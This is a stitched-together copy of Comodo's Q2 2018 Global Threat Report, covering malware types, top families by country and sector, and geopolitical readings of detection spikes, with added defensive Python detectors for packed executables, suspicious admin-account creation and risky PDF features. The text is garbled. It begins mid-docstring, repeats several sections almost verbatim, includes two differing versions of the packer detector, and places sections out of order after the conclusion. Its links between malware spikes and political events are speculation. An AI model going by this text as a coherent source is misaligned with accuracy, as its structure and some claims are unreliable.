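Stock UPX leaves sections named UPX0/UPX1; a modified build such as the
MUPX discussed above can rename them, so the check below also measures
the Shannon entropy of each section's raw data: compressed or encrypted
code sits near 8 bits per byte, ordinary code and text well below. The
PE parser and the sample images are constructed for this example.
"""
import math
import random
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Return [(section name, raw bytes)] read from the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]   # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                             # first section header
    sections = []
    for i in range(nsec):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", pe, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def packer_indicators(pe: bytes, entropy_threshold: float = 7.0):
    """List human-readable reasons to suspect the file is packed."""
    reasons = []
    for name, data in parse_sections(pe):
        if name.upper().startswith("UPX"):
            reasons.append(f"section '{name}' carries a stock UPX name")
        h = shannon_entropy(data)
        if len(data) >= 256 and h > entropy_threshold:
            reasons.append(f"section '{name}' entropy {h:.2f} bits/byte")
    return reasons


def build_fake_pe(sections):
    """Constructed minimal PE-shaped image (headers plus section table); not executable."""
    e_lfanew, opt_size = 0x40, 224
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    raw_ptr = e_lfanew + 24 + opt_size + 40 * len(sections)
    table, blobs = b"", b""
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), 0x1000, len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        blobs += data
        raw_ptr += len(data)
    return dos + coff + b"\0" * opt_size + table + blobs


_rng = random.Random(2018)
HIGH_ENTROPY = bytes(_rng.getrandbits(8) for _ in range(4096))   # stands in for packed code
PLAIN_TEXT = b"The quick brown fox jumps over the lazy dog. " * 100

STOCK_UPX = build_fake_pe([("UPX0", b""), ("UPX1", HIGH_ENTROPY), (".rsrc", PLAIN_TEXT)])
RENAMED_PACKER = build_fake_pe([(".text", HIGH_ENTROPY), (".data", PLAIN_TEXT)])
UNPACKED = build_fake_pe([(".text", PLAIN_TEXT), (".data", PLAIN_TEXT)])

if __name__ == "__main__":
    for label, img in [("stock UPX", STOCK_UPX), ("renamed", RENAMED_PACKER),
                       ("unpacked", UNPACKED)]:
        print(label, packer_indicators(img) or ["no indicators"])
```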


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.


5.4 Low Threat Malware Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider, and/or perform other actions users might not have intended. They include free toolbars, adware, and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality, but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3, respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military, and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics, or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world, but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder to detect by antivirus software. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies, and postures.

NORTH AMERICA
Comodo Security Solutions, Inc.
1255 Broad Street, Clifton, NJ 07013, United States
Tel: +1 (888) 551 1531 / Tel: +1 (888) 266 6361 / Int: +1 (703) 581 6361 / Fax: +1 (973) 777 4394
sales@comodo.com

EUROPE
Comodo Security Solutions, Inc.
Șoseaua Națională 31, Iași 700237, Romania
Tel: +40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd.
Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India
Tel: +91 44 4562 2800
www.comodo.co.in

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC.

VISIT COMODO.COM

Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.


Global Threat Report Q2 2018 Edition

Page 46 of 73

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
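The Starter behavior described above, an account created and then placed in the local Administrators group, leaves a recognizable trace in Windows audit logs. The following is an added example, not Comodo's code or data, that correlates the two events: Security event ID 4720 (a user account was created) followed within a short window by 4732 (a member was added to a security-enabled local group) for the same account. The event records are constructed for the demo in a simplified pipe-delimited form; a real deployment would read the same fields from the Security log or a SIEM.

```python
"""Correlate local account creation with prompt Administrators membership.

Added example, not Comodo's code. Event IDs 4720 and 4732 are real Windows
Security log events; the records below are constructed for the demo.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample records: timestamp|event_id|subject (who acted)|target account|group
SAMPLE_EVENTS = """\
2018-06-02T09:14:05|4720|CORP\\jsmith|svc_remote|
2018-06-02T09:14:07|4732|CORP\\jsmith|svc_remote|Administrators
2018-06-02T10:30:00|4720|CORP\\helpdesk|newhire01|
2018-06-02T10:31:00|4732|CORP\\helpdesk|newhire01|Remote Desktop Users
2018-06-03T08:00:00|4732|CORP\\helpdesk|newhire01|Administrators
"""


@dataclass
class Event:
    when: datetime
    event_id: int
    subject: str
    target: str
    group: str


def parse_events(text: str) -> list:
    """Parse the simplified pipe-delimited records into Event objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, subject, target, group = line.split("|")
        events.append(Event(datetime.fromisoformat(ts), int(eid), subject, target, group))
    return events


def find_suspicious_admin_accounts(events, window=timedelta(minutes=5)):
    """Return (account, actor, seconds) for accounts created (4720) and then
    added to Administrators (4732) within `window` of creation.

    A legitimate provisioning flow normally separates the two steps or never
    grants Administrators at all, so a tight creation-to-promotion gap is a
    useful triage signal rather than proof of compromise.
    """
    created = {}  # account name -> creation time
    hits = []
    for ev in sorted(events, key=lambda e: e.when):
        if ev.event_id == 4720:
            created[ev.target] = ev.when
        elif ev.event_id == 4732 and ev.group == "Administrators":
            t0 = created.get(ev.target)
            if t0 is not None and ev.when - t0 <= window:
                hits.append((ev.target, ev.subject, (ev.when - t0).total_seconds()))
    return hits


if __name__ == "__main__":
    for account, actor, secs in find_suspicious_admin_accounts(parse_events(SAMPLE_EVENTS)):
        print(f"ALERT: {account} created and added to Administrators by {actor} within {secs:.0f}s")
```

Only svc_remote is flagged: newhire01 was also promoted, but a day after creation, which is the kind of gap a normal change process produces and would need a different rule (for example, any addition to Administrators outside change windows) to catch.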

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
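Because most Q2 exploit detections involved PDF files, a useful first triage step for incoming documents is to check for the PDF features that exploit documents rely on to run code without the reader's involvement. The following is an added example, not Comodo's tooling: it counts standard PDF name tokens such as /OpenAction, /JavaScript and /Launch, repeats the count after undoing the #xx hex escaping that PDF allows inside names (a common way of hiding them from naive scanners), and turns the findings into a simple score. The weights and the three sample documents are constructed for the demo.

```python
"""Triage a PDF for the features that document exploits typically rely on.

Added example, not Comodo's tooling. The name tokens below are standard PDF
syntax; the weights and sample documents are constructed for the demo.
"""
import re

# PDF name objects that trigger automatic actions or script execution.
RISKY_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
               b"/EmbeddedFile", b"/RichMedia")

# Constructed weights: script and launch actions count more than mere embedding.
WEIGHTS = {"/JavaScript": 3, "/JS": 3, "/Launch": 3, "/OpenAction": 2, "/AA": 2,
           "/EmbeddedFile": 1, "/RichMedia": 1}


def _count_names(data: bytes) -> dict:
    counts = {}
    for name in RISKY_NAMES:
        # The lookahead stops "/JS" from matching a longer name such as "/JSX".
        n = len(re.findall(re.escape(name) + rb"(?![A-Za-z])", data))
        if n:
            counts[name.decode()] = n
    return counts


def _unescape_names(data: bytes) -> bytes:
    """Undo PDF's #xx hex escaping inside names (e.g. /Java#53cript -> /JavaScript)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data: bytes) -> dict:
    """Return {name: count}; names only visible after hex-unescaping are tagged."""
    findings = {}
    if not data.startswith(b"%PDF-"):
        findings["missing_pdf_header"] = 1
    findings.update(_count_names(data))
    for name, n in _count_names(_unescape_names(data)).items():
        if name not in findings:
            findings[name + " (hex-escaped)"] = n
    return findings


def risk_score(findings: dict) -> int:
    score = 0
    for key, n in findings.items():
        base = key.replace(" (hex-escaped)", "")
        # Hidden names are counted double: obfuscation is itself a signal.
        score += WEIGHTS.get(base, 0) * n * (2 if key != base else 1)
    return score


# Constructed sample documents (minimal fragments, not renderable PDFs).
BENIGN_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Count 0 >> endobj\n%%EOF\n")
SCRIPTED_PDF = (b"%PDF-1.7\n1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n"
                b"3 0 obj << /S /JavaScript /JS (app.alert('hi')) >> endobj\n%%EOF\n")
ESCAPED_PDF = (b"%PDF-1.7\n1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n"
               b"3 0 obj << /S /Java#53cript /#4AS (app.alert('hi')) >> endobj\n%%EOF\n")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("scripted", SCRIPTED_PDF), ("escaped", ESCAPED_PDF)):
        f = triage_pdf(doc)
        print(f"{label}: score={risk_score(f)} findings={f}")
```

A score like this is for prioritising which documents go to a sandbox or an analyst, not a verdict: legitimate forms use /JavaScript and /AA too, and a document with a high score but no auto-action may still be harmless.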

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and leverages an open-source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
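Two heuristics that defenders commonly use to flag packed executables, given here as an added example rather than Comodo's method: the section names and trailer marker that stock UPX writes (UPX0, UPX1, UPX!), and the Shannon entropy of the file contents, which compression or encryption pushes toward 8 bits per byte. A modified packer such as the MUPX variant named above may rename the sections, which is why the entropy check matters alongside the string match. The threshold and the sample buffers are constructed for the demo.

```python
"""Heuristics for spotting packed executables: UPX markers and byte entropy.

Added example, not Comodo's method. "UPX0"/"UPX1"/"UPX!" are what stock UPX
writes; the entropy threshold and sample buffers are constructed for the demo.
"""
import math
import random
from collections import Counter

UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, from 0.0 (constant data) up to 8.0 (uniformly random)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def packer_indicators(data: bytes, entropy_threshold: float = 7.2) -> dict:
    """Return the indicators found; an empty dict means nothing suspicious.

    A plain compiled binary usually sits well below the threshold because
    code and tables have structure; a packed or encrypted body does not.
    """
    found = {}
    markers = [m.decode() for m in UPX_MARKERS if m in data]
    if markers:
        found["upx_markers"] = markers
    ent = shannon_entropy(data)
    if ent >= entropy_threshold:
        found["high_entropy"] = round(ent, 2)
    return found


# Constructed samples: repetitive text (low entropy), a pseudo-random body that
# stands in for a compressed payload (high entropy), and that body wrapped in
# stock UPX section names and trailer marker.
PLAIN = b"This is an ordinary, uncompressed text section. " * 80
_rng = random.Random(2018)  # fixed seed so the demo is reproducible
PACKED_BODY = bytes(_rng.getrandbits(8) for _ in range(4096))
STOCK_UPX = b"UPX0\x00\x00\x00\x00UPX1\x00\x00\x00\x00" + PACKED_BODY + b"UPX!"

if __name__ == "__main__":
    for label, buf in (("plain", PLAIN), ("packed body", PACKED_BODY), ("stock upx", STOCK_UPX)):
        print(f"{label}: entropy={shannon_entropy(buf):.2f} indicators={packer_indicators(buf)}")
```

On a real PE file the same two checks would be run per section rather than over the whole image, since a packed program typically has one near-random section next to a small, low-entropy unpacking stub.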

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

